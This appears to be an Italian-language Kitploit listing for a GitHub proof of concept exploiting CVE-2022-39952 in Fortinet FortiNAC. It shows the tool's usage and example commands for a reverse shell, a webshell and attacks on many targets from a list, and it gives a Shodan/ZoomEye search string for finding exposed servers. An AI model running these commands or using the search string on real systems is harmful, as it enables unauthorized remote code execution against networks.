Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-39952-better — PoC per CVE-2022-39952 che riguarda Fortinet FortiNAC. | Kitploit
Strumenti/GitHubGitHub/dkstar11q/cve-2022-39952-better
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubdkstar11q/cve-2022-39952-better

CVE-2022-39952-better

PoC per CVE-2022-39952 che riguarda Fortinet FortiNAC.

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

FortiNAC CVE-2022-39952

PoC per CVE-2022-39952 che interessa Fortinet FortiNAC.

Questo exploit consente a un attaccante di eseguire comandi arbitrari sul server FortiNAC. Si basa sul PoC sviluppato da horizon3ai, con opzioni aggiuntive per colpire più host.

Disclaimer: questo exploit è solo a scopo educativo. Si prega di usarlo in modo responsabile e con autorizzazione.

Utilizzo:

root@kitploit:~
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -l LIST, --list LIST  List of targets
  -lh LHOST, --lhost LHOST
                        The local host for the reverse shell
  -lp LPORT, --lport LPORT
                        The local port for the reverse shell

Per usare questo exploit, devi avere Python 3.x installato sul tuo sistema.

Requisiti:

root@kitploit:~
Python 3.x
modulo requests
modulo concurrent.futures

Esempi:

Eseguire una reverse shell su un singolo target:

root@kitploit:~
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444

Eseguire una webshell su un singolo target:

root@kitploit:~
$ python exploit.py -t 192.168.1.100

Eseguire una webshell su più target da una lista:

root@kitploit:~
$ python exploit.py -l targets.txt

Nota:

Questo exploit è stato testato solo su un numero limitato di target, quindi la sua efficacia può variare. La dork per trovare potenziali target su ZoomEye e Shodan è:

title:"FortiNAC" +"JSESSIONID"

Scarica lo strumento